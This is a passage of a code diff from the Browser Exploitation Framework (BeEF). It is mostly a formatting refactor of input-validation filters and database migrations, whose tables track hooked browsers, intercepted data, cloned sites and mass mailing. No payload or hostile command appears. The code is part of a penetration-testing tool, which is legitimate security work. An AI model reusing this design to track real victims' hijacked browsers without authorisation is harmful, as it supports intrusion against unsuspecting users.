-  # @note This function passes the \302\256 character which translates to the registered symbol (r)
-  def self.has_valid_base_chars?(str)
-    return false unless is_non_empty_string?(str)
-    (str =~ /[^\302\256[:print:]]/).nil? 
-  end  
-
-  # Verify the yes and no is valid
-  #   @param [String] str String for testing
-  #   @return [Boolean] If the string is either 'yes' or 'no'
-  def self.is_valid_yes_no?(str)
-    return false if has_non_printable_char?(str)
-    return false if str !~ /\A(Yes|No)\z/i
-    true
-  end
-
-end
 end
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,151 +1,162 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Filters
+  module Filters
+    # Check the browser type value - for example, 'FF'
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid browser name characters
+    def self.is_valid_browsername?(str)
+      return false unless is_non_empty_string?(str)
+      return false if str.length > 2
+      return false if has_non_printable_char?(str)

-  # Check the browser type value - for example, 'FF'
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser name characters
-  def self.is_valid_browsername?(str)
-    return false unless is_non_empty_string?(str)
-    return false if str.length > 2
-    return false if has_non_printable_char?(str)
-    true
-  end
+      true
+    end

-  # Check the Operating System name value - for example, 'Windows XP'
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid Operating System name characters
-  def self.is_valid_osname?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length < 2
-    true
-  end
+    # Check the Operating System name value - for example, 'Windows XP'
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid Operating System name characters
+    def self.is_valid_osname?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length < 2

-  # Check the Hardware name value - for example, 'iPhone'
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid Hardware name characters
-  def self.is_valid_hwname?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length < 2
-    true
-  end
+      true
+    end

-  # Verify the browser version string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser version characters
-  def self.is_valid_browserversion?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return true if str.eql? "UNKNOWN"
-    return true if str.eql? "ALL"
-    return false if not nums_only?(str) and not is_valid_float?(str)  
-    return false if str.length > 20
-    true
-  end
+    # Check the Hardware name value - for example, 'iPhone'
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid Hardware name characters
+    def self.is_valid_hwname?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length < 2

-  # Verify the os version string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid os version characters
-  def self.is_valid_osversion?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return true if str.eql? "UNKNOWN"
-    return true if str.eql? "ALL"
-    return false unless BeEF::Filters::only?("a-zA-Z0-9.<=> ", str)
-    return false if str.length > 20
-    true
-  end
+      true
+    end

-  # Verify the browser/UA string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser / ua string characters
-  def self.is_valid_browserstring?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 300      
-    true
-  end
-  
-  # Verify the cookies are valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid cookie characters
-  def self.is_valid_cookies?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 2000
-    true
-  end
+    # Verify the browser version string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid browser version characters
+    def self.is_valid_browserversion?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return true if str.eql? 'UNKNOWN'
+      return true if str.eql? 'ALL'
+      return false if !nums_only?(str) and !is_valid_float?(str)
+      return false if str.length > 20

-  # Verify the system platform is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid system platform characters
-  def self.is_valid_system_platform?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 200
-    true
-  end
+      true
+    end

-  # Verify the date stamp is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid date stamp characters
-  def self.is_valid_date_stamp?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 200
-    true
-  end
+    # Verify the os version string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid os version characters
+    def self.is_valid_osversion?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return true if str.eql? 'UNKNOWN'
+      return true if str.eql? 'ALL'
+      return false unless BeEF::Filters.only?('a-zA-Z0-9.<=> ', str)
+      return false if str.length > 20

-  # Verify the CPU type string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid CPU type characters
-  def self.is_valid_cpu?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 200
-    true
-  end
+      true
+    end

-  # Verify the memory string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid memory type characters
-  def self.is_valid_memory?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 200
-    true
-  end
+    # Verify the browser/UA string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid browser / ua string characters
+    def self.is_valid_browserstring?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length > 300

-  # Verify the GPU type string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid GPU type characters
-  def self.is_valid_gpu?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 200
-    true
-  end
+      true
+    end

-  # Verify the browser_plugins string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser plugin characters
-  # @note This string can be empty if there are no browser plugins
-  # @todo Verify if the ruby version statement is still necessary
-  def self.is_valid_browser_plugins?(str)
-    return false unless is_non_empty_string?(str)
-    return false if str.length > 1000
-    if str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
-    else
-      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
+    # Verify the cookies are valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid cookie characters
+    def self.is_valid_cookies?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length > 2000
+
+      true
+    end
+
+    # Verify the system platform is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid system platform characters
+    def self.is_valid_system_platform?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length > 200
+
+      true
+    end
+
+    # Verify the date stamp is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid date stamp characters
+    def self.is_valid_date_stamp?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length > 200
+
+      true
+    end
+
+    # Verify the CPU type string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid CPU type characters
+    def self.is_valid_cpu?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length > 200
+
+      true
+    end
+
+    # Verify the memory string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid memory type characters
+    def self.is_valid_memory?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length > 200
+
+      true
+    end
+
+    # Verify the GPU type string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid GPU type characters
+    def self.is_valid_gpu?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length > 200
+
+      true
+    end
+
+    # Verify the browser_plugins string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid browser plugin characters
+    # @note This string can be empty if there are no browser plugins
+    # @todo Verify if the ruby version statement is still necessary
+    def self.is_valid_browser_plugins?(str)
+      return false unless is_non_empty_string?(str)
+      return false if str.length > 1000
+
+      if str.encoding === Encoding.find('UTF-8')
+        (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
+      else
+        (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
+      end
    end
  end
-
-end  
 end
--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,67 +1,71 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Filters
-    
-  # Check if the string is a valid path from a HTTP request
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid path characters
-  def self.is_valid_path_info?(str)
-    return false if str.nil?
-    return false unless str.is_a? String
-    return false if has_non_printable_char?(str)
-    true
-  end
+  module Filters
+    # Check if the string is a valid path from a HTTP request
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid path characters
+    def self.is_valid_path_info?(str)
+      return false if str.nil?
+      return false unless str.is_a? String
+      return false if has_non_printable_char?(str)

-  # Check if the session id valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid hook session id characters
-  def self.is_valid_hook_session_id?(str)
-    return false unless is_non_empty_string?(str)
-    return false unless has_valid_key_chars?(str) 
-    true
-  end
+      true
+    end

-  # Check if valid command module datastore key
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid command module datastore key characters
-  def self.is_valid_command_module_datastore_key?(str)
-    return false unless is_non_empty_string?(str)
-    return false unless has_valid_key_chars?(str)      
-    true
-  end
+    # Check if the session id valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid hook session id characters
+    def self.is_valid_hook_session_id?(str)
+      return false unless is_non_empty_string?(str)
+      return false unless has_valid_key_chars?(str)

-  # Check if valid command module datastore value
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid command module datastore param characters
-  def self.is_valid_command_module_datastore_param?(str)
-    return false if has_null?(str)
-    return false unless has_valid_base_chars?(str)
-    true
-  end
+      true
+    end

-  # Check for word and some punc chars
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid key characters
-  def self.has_valid_key_chars?(str)
-    return false unless is_non_empty_string?(str)
-    return false unless has_valid_base_chars?(str)
-    true
-  end
+    # Check if valid command module datastore key
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid command module datastore key characters
+    def self.is_valid_command_module_datastore_key?(str)
+      return false unless is_non_empty_string?(str)
+      return false unless has_valid_key_chars?(str)

-  # Check for word and underscore chars
-  # @param [String] str String for testing
-  # @return [Boolean] If the sting has valid param characters
-  def self.has_valid_param_chars?(str)
-    return false if str.nil?
-    return false unless str.is_a? String
-    return false if str.empty?
-    return false unless (str =~ /[^\w_\:]/).nil?
-    true
-  end
+      true
+    end

-end
+    # Check if valid command module datastore value
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid command module datastore param characters
+    def self.is_valid_command_module_datastore_param?(str)
+      return false if has_null?(str)
+      return false unless has_valid_base_chars?(str)
+
+      true
+    end
+
+    # Check for word and some punc chars
+    # @param [String] str String for testing
+    # @return [Boolean] If the string has valid key characters
+    def self.has_valid_key_chars?(str)
+      return false unless is_non_empty_string?(str)
+      return false unless has_valid_base_chars?(str)
+
+      true
+    end
+
+    # Check for word and underscore chars
+    # @param [String] str String for testing
+    # @return [Boolean] If the sting has valid param characters
+    def self.has_valid_param_chars?(str)
+      return false if str.nil?
+      return false unless str.is_a? String
+      return false if str.empty?
+      return false unless (str =~ /[^\w_:]/).nil?
+
+      true
+    end
+  end
 end
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,61 +1,62 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-module BeEF  
-module Filters
-  
-  # Verify the hostname string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string is a valid hostname
-  def self.is_valid_hostname?(str)
-    return false unless is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)
-    return false if str.length > 255
-    return false if (str =~ /^[a-zA-Z0-9][a-zA-Z0-9\-\.]*[a-zA-Z0-9]$/).nil?
-    true
+module BeEF
+  module Filters
+    # Verify the hostname string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string is a valid hostname
+    def self.is_valid_hostname?(str)
+      return false unless is_non_empty_string?(str)
+      return false if has_non_printable_char?(str)
+      return false if str.length > 255
+      return false if (str =~ /^[a-zA-Z0-9][a-zA-Z0-9\-.]*[a-zA-Z0-9]$/).nil?
+
+      true
+    end
+
+    def self.is_valid_verb?(verb)
+      %w[HEAD GET POST OPTIONS PUT DELETE].each { |v| return true if verb.eql? v }
+      false
+    end
+
+    def self.is_valid_url?(uri)
+      return true unless uri.nil?
+
+      # OPTIONS * is not yet supported
+      # return true if uri.eql? "*"
+      # TODO : CHECK THE normalize_path method and include it somewhere (maybe here)
+      # return true if uri.eql? self.normalize_path(uri)
+      false
+    end
+
+    def self.is_valid_http_version?(version)
+      # from browsers the http version contains a space at the end ("HTTP/1.0\r")
+      version.gsub!(/\r+/, '')
+      ['HTTP/1.0', 'HTTP/1.1'].each { |v| return true if version.eql? v }
+      false
+    end
+
+    def self.is_valid_host_str?(host_str)
+      # from browsers the host header contains a space at the end
+      host_str.gsub!(/\r+/, '')
+      return true if 'Host:'.eql?(host_str)
+
+      false
+    end
+
+    def normalize_path(path)
+      print_error "abnormal path `#{path}'" if path[0] != '/'
+      ret = path.dup
+
+      ret.gsub!(%r{/+}o, '/')                    # //      => /
+      while ret.sub!(%r{/\.(?:/|\Z)}, '/'); end  # /.      => /
+      while ret.sub!(%r{/(?!\.\./)[^/]+/\.\.(?:/|\Z)}, '/'); end # /foo/.. => /foo
+
+      print_error "abnormal path `#{path}'" if %r{/\.\.(/|\Z)} =~ ret
+      ret
+    end
  end
-
-  def self.is_valid_verb?(verb)
-    ["HEAD", "GET", "POST", "OPTIONS", "PUT", "DELETE"].each {|v| return true if verb.eql? v }
-    false
-  end
-
-  def self.is_valid_url?(uri)
-    return true if !uri.nil?
-    # OPTIONS * is not yet supported
-    #return true if uri.eql? "*"
-    # TODO : CHECK THE normalize_path method and include it somewhere (maybe here)
-    #return true if uri.eql? self.normalize_path(uri)
-    false
-  end
-
-  def self.is_valid_http_version?(version)
-    # from browsers the http version contains a space at the end ("HTTP/1.0\r")
-    version.gsub!(/[\r]+/,"")
-    ["HTTP/1.0", "HTTP/1.1"].each {|v| return true if version.eql? v }
-    false
-  end
-
-  def self.is_valid_host_str?(host_str)
-    # from browsers the host header contains a space at the end
-    host_str.gsub!(/[\r]+/,"")
-    return true if "Host:".eql?(host_str)
-    false
-  end 
-
-  def normalize_path(path)
-    print_error "abnormal path `#{path}'" if path[0] != ?/
-    ret = path.dup
-
-    ret.gsub!(%r{/+}o, '/')                    # //      => /
-    while ret.sub!(%r'/\.(?:/|\Z)', '/'); end  # /.      => /
-    while ret.sub!(%r'/(?!\.\./)[^/]+/\.\.(?:/|\Z)', '/'); end # /foo/.. => /foo
-
-    print_error "abnormal path `#{path}'" if %r{/\.\.(/|\Z)} =~ ret
-    ret
-  end
-
-end
 end
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,30 +1,30 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Filters
-  
-  # Verify the page title string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string is a valid page title
-  def self.is_valid_pagetitle?(str)
-    return false unless str.is_a? String
-    return false if has_non_printable_char?(str)
-    return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer
-    true
-  end
+  module Filters
+    # Verify the page title string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string is a valid page title
+    def self.is_valid_pagetitle?(str)
+      return false unless str.is_a? String
+      return false if has_non_printable_char?(str)
+      return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer

-  # Verify the page referrer string is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string is a valid referrer
-  def self.is_valid_pagereferrer?(str)
-    return false unless str.is_a? String
-    return false if has_non_printable_char?(str)
-    return false if str.length > 350
-    true
+      true
+    end
+
+    # Verify the page referrer string is valid
+    # @param [String] str String for testing
+    # @return [Boolean] If the string is a valid referrer
+    def self.is_valid_pagereferrer?(str)
+      return false unless str.is_a? String
+      return false if has_non_printable_char?(str)
+      return false if str.length > 350
+
+      true
+    end
  end
-  
-end
 end
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,16 +1,15 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module HBManager
-
    # Get hooked browser by session id
    # @param [String] sid hooked browser session id string
    # @return [BeEF::Core::Models::HookedBrowser] returns the associated Hooked Browser
    def self.get_by_session(sid)
-      BeEF::Core::Models::HookedBrowser.where(:session => sid).first
+      BeEF::Core::Models::HookedBrowser.where(session: sid).first
    end

    # Get hooked browser by id
@@ -19,6 +18,5 @@ module BeEF
    def self.get_by_id(id)
      BeEF::Core::Models::HookedBrowser.find(id)
    end
-
  end
 end
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/logger.rb
+++ b/core/logger.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -12,8 +12,8 @@ module BeEF
    attr_writer :logger

    def logger
-        @logger ||= Logger.new("#{$home_dir}/beef.log").tap do |log|
-        log.progname = self.name
+      @logger ||= Logger.new("#{$home_dir}/beef.log").tap do |log|
+        log.progname = name
        log.level = Logger::WARN
      end
    end
--- a/core/main/ar-migrations/001_create_command_modules.rb
+++ b/core/main/ar-migrations/001_create_command_modules.rb
@@ -1,12 +1,8 @@
 class CreateCommandModules < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :command_modules do |t|
-			t.text :name
-			t.text :path
-		end
-
-	end
-
+  def change
+    create_table :command_modules do |t|
+      t.text :name
+      t.text :path
+    end
+  end
 end
--- a/core/main/ar-migrations/002_create_hooked_browsers.rb
+++ b/core/main/ar-migrations/002_create_hooked_browsers.rb
@@ -1,19 +1,15 @@
 class CreateHookedBrowsers < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :hooked_browsers do |t|
-            t.text :session
-			t.text :ip
-			t.text :firstseen
-			t.text :lastseen
-			t.text :httpheaders
-			t.text :domain
-			t.integer :port
-			t.integer :count
-			t.boolean :is_proxy
-		end
-
-	end
-
+  def change
+    create_table :hooked_browsers do |t|
+      t.text :session
+      t.text :ip
+      t.text :firstseen
+      t.text :lastseen
+      t.text :httpheaders
+      t.text :domain
+      t.integer :port
+      t.integer :count
+      t.boolean :is_proxy
+    end
+  end
 end
--- a/core/main/ar-migrations/003_create_logs.rb
+++ b/core/main/ar-migrations/003_create_logs.rb
@@ -1,14 +1,10 @@
 class CreateLogs < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :logs do |t|
-			t.text :logtype
-			t.text :event
-			t.datetime :date
-			t.references :hooked_browser
-		end
-
-	end
-
+  def change
+    create_table :logs do |t|
+      t.text :logtype
+      t.text :event
+      t.datetime :date
+      t.references :hooked_browser
+    end
+  end
 end
--- a/core/main/ar-migrations/004_create_commands.rb
+++ b/core/main/ar-migrations/004_create_commands.rb
@@ -1,16 +1,12 @@
 class CreateCommands < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :commands do |t|
-            t.references :command_module
-            t.references :hooked_browser
-			t.text :data
-			t.datetime :creationdate
-			t.text :label
-			t.boolean :instructions_sent, default: false
-		end
-
-	end
-
+  def change
+    create_table :commands do |t|
+      t.references :command_module
+      t.references :hooked_browser
+      t.text :data
+      t.datetime :creationdate
+      t.text :label
+      t.boolean :instructions_sent, default: false
+    end
+  end
 end
--- a/core/main/ar-migrations/005_create_results.rb
+++ b/core/main/ar-migrations/005_create_results.rb
@@ -1,15 +1,11 @@
 class CreateResults < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :results do |t|
-            t.references :command
-            t.references :hooked_browser
-			t.datetime :date
-			t.integer :status
-            t.text :data
-		end
-
-	end
-
+  def change
+    create_table :results do |t|
+      t.references :command
+      t.references :hooked_browser
+      t.datetime :date
+      t.integer :status
+      t.text :data
+    end
+  end
 end
--- a/core/main/ar-migrations/006_create_option_caches.rb
+++ b/core/main/ar-migrations/006_create_option_caches.rb
@@ -1,12 +1,8 @@
 class CreateOptionCaches < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :option_caches do |t|
-			t.text :name
-			t.text :value
-		end
-
-	end
-
+  def change
+    create_table :option_caches do |t|
+      t.text :name
+      t.text :value
+    end
+  end
 end
--- a/core/main/ar-migrations/007_create_browser_details.rb
+++ b/core/main/ar-migrations/007_create_browser_details.rb
@@ -1,13 +1,9 @@
 class CreateBrowserDetails < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :browser_details do |t|
-			t.text :session_id
-			t.text :detail_key
-			t.text :detail_value
-		end
-
-	end
-
+  def change
+    create_table :browser_details do |t|
+      t.text :session_id
+      t.text :detail_key
+      t.text :detail_value
+    end
+  end
 end
--- a/core/main/ar-migrations/008_create_executions.rb
+++ b/core/main/ar-migrations/008_create_executions.rb
@@ -1,17 +1,14 @@
 class CreateExecutions < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :executions do |t|
-            t.text :session_id
-			t.integer :mod_count
-			t.integer :mod_successful
-			t.text :mod_body
-			t.text :exec_time
-			t.text :rule_token
-			t.boolean :is_sent
-		end
-
-	end
-
+  def change
+    create_table :executions do |t|
+      t.text :session_id
+      t.integer :mod_count
+      t.integer :mod_successful
+      t.text :mod_body
+      t.text :exec_time
+      t.text :rule_token
+      t.boolean :is_sent
+      t.integer :rule_id
+    end
+  end
 end
--- a/core/main/ar-migrations/009_create_rules.rb
+++ b/core/main/ar-migrations/009_create_rules.rb
@@ -1,20 +1,16 @@
 class CreateRules < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :rules do |t|
-			t.text :name
-			t.text :author
-			t.text :browser
-			t.text :browser_version
-			t.text :os
-			t.text :os_version
-			t.text :modules
-			t.text :execution_order
-			t.text :execution_delay
-			t.text :chain_mode
-		end
-
-	end
-
+  def change
+    create_table :rules do |t|
+      t.text :name
+      t.text :author
+      t.text :browser
+      t.text :browser_version
+      t.text :os
+      t.text :os_version
+      t.text :modules
+      t.text :execution_order
+      t.text :execution_delay
+      t.text :chain_mode
+    end
+  end
 end
--- a/core/main/ar-migrations/010_create_interceptor.rb
+++ b/core/main/ar-migrations/010_create_interceptor.rb
@@ -1,12 +1,8 @@
 class CreateInterceptor < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :interceptors do |t|
-            t.text :ip
-            t.text :post_data
-		end
-
-	end
-
+  def change
+    create_table :interceptors do |t|
+      t.text :ip
+      t.text :post_data
+    end
+  end
 end
--- a/core/main/ar-migrations/011_create_web_cloner.rb
+++ b/core/main/ar-migrations/011_create_web_cloner.rb
@@ -1,12 +1,8 @@
 class CreateWebCloner < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :web_cloner do |t|
-            t.text :uri
-            t.text :mount
-		end
-
-	end
-
+  def change
+    create_table :web_cloners do |t|
+      t.text :uri
+      t.text :mount
+    end
+  end
 end
--- a/core/main/ar-migrations/012_create_mass_mailer.rb
+++ b/core/main/ar-migrations/012_create_mass_mailer.rb
@@ -1,11 +1,7 @@
 class CreateMassMailer < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :mass_mailer do |t|
-            #todo fields
-		end
-
-	end
-
+  def change
+    create_table :mass_mailers do |t|
+      # TODO: fields
+    end
+  end
 end
--- a/core/main/ar-migrations/013_create_network_host.rb
+++ b/core/main/ar-migrations/013_create_network_host.rb
@@ -1,17 +1,13 @@
 class CreateNetworkHost < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :network_hosts do |t|
-            t.references :hooked_browser
-            t.text :ip
-            t.text :hostname
-            t.text :ntype
-            t.text :os
-            t.text :mac
-            t.text :lastseen
-		end
-
-	end
-
+  def change
+    create_table :network_hosts do |t|
+      t.references :hooked_browser
+      t.text :ip
+      t.text :hostname
+      t.text :ntype
+      t.text :os
+      t.text :mac
+      t.text :lastseen
+    end
+  end
 end
--- a/core/main/ar-migrations/014_create_network_service.rb
+++ b/core/main/ar-migrations/014_create_network_service.rb
@@ -1,15 +1,11 @@
 class CreateNetworkService < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :network_services do |t|
-            t.references :hooked_browser
-            t.text :proto
-            t.text :ip
-            t.text :port
-            t.text :ntype
-		end
-
-	end
-
+  def change
+    create_table :network_services do |t|
+      t.references :hooked_browser
+      t.text :proto
+      t.text :ip
+      t.text :port
+      t.text :ntype
+    end
+  end
 end
--- a/core/main/ar-migrations/015_create_http.rb
+++ b/core/main/ar-migrations/015_create_http.rb
@@ -1,44 +1,40 @@
 class CreateHttp < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :http do |t|
-            t.references :hooked_browser
-            # The http request to perform. In clear text.
-            t.text :request
-            # Boolean value as string to say whether cross-domain requests are allowed
-            t.boolean :allow_cross_domain, :default => true
-            # The http response body received. In clear text.
-            t.text :response_data
-            # The http response code. Useful to handle cases like 404, 500, 302, ...
-            t.integer :response_status_code
-            # The http response code. Human-readable code: success, error, ecc..
-            t.text :response_status_text
-            # The port status. closed, open or not http
-            t.text :response_port_status
-            # The XHR Http response raw headers
-            t.text :response_headers
-            # The http response method. GET or POST.
-            t.text :method
-            # The content length for the request.
-            t.text :content_length, :default => 0
-            # The request protocol/scheme (http/https)
-            t.text :proto
-            # The domain on which perform the request.
-            t.text :domain
-            # The port on which perform the request.
-            t.text :port
-            # Boolean value to say if the request was cross-domain
-            t.text :has_ran, :default => "waiting"
-            # The path of the request.
-            # Example: /secret.html
-            t.text :path
-            # The date at which the http response has been saved.
-            t.datetime :response_date
-            # The date at which the http request has been saved.
-            t.datetime :request_date
-		end
-
-	end
-
+  def change
+    create_table :https do |t|
+      t.text :hooked_browser_id
+      # The http request to perform. In clear text.
+      t.text :request
+      # Boolean value as string to say whether cross-domain requests are allowed
+      t.boolean :allow_cross_domain, default: true
+      # The http response body received. In clear text.
+      t.text :response_data
+      # The http response code. Useful to handle cases like 404, 500, 302, ...
+      t.integer :response_status_code
+      # The http response code. Human-readable code: success, error, ecc..
+      t.text :response_status_text
+      # The port status. closed, open or not http
+      t.text :response_port_status
+      # The XHR Http response raw headers
+      t.text :response_headers
+      # The http response method. GET or POST.
+      t.text :method
+      # The content length for the request.
+      t.text :content_length, default: 0
+      # The request protocol/scheme (http/https)
+      t.text :proto
+      # The domain on which perform the request.
+      t.text :domain
+      # The port on which perform the request.
+      t.text :port
+      # Boolean value to say if the request was cross-domain
+      t.text :has_ran, default: 'waiting'
+      # The path of the request.
+      # Example: /secret.html
+      t.text :path
+      # The date at which the http response has been saved.
+      t.datetime :response_date
+      # The date at which the http request has been saved.
+      t.datetime :request_date
+    end
+  end
 end
--- a/core/main/ar-migrations/016_create_rtc_status.rb
+++ b/core/main/ar-migrations/016_create_rtc_status.rb
@@ -1,13 +1,9 @@
 class CreateRtcStatus < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :rtc_status do |t|
-            t.references :hooked_browser
-            t.integer :target_hooked_browser_id
-            t.text :status
-		end
-
-	end
-
+  def change
+    create_table :rtc_statuss do |t|
+      t.references :hooked_browser
+      t.integer :target_hooked_browser_id
+      t.text :status
+    end
+  end
 end
--- a/core/main/ar-migrations/017_create_rtc_manage.rb
+++ b/core/main/ar-migrations/017_create_rtc_manage.rb
@@ -1,13 +1,9 @@
 class CreateRtcManage < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :rtc_manage do |t|
-            t.references :hooked_browser
-            t.text :message
-            t.text :has_sent, default: "waiting"
-		end
-
-	end
-
+  def change
+    create_table :rtc_manages do |t|
+      t.references :hooked_browser
+      t.text :message
+      t.text :has_sent, default: 'waiting'
+    end
+  end
 end
--- a/core/main/ar-migrations/018_create_rtc_signal.rb
+++ b/core/main/ar-migrations/018_create_rtc_signal.rb
@@ -1,14 +1,10 @@
 class CreateRtcSignal < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :rtc_signal do |t|
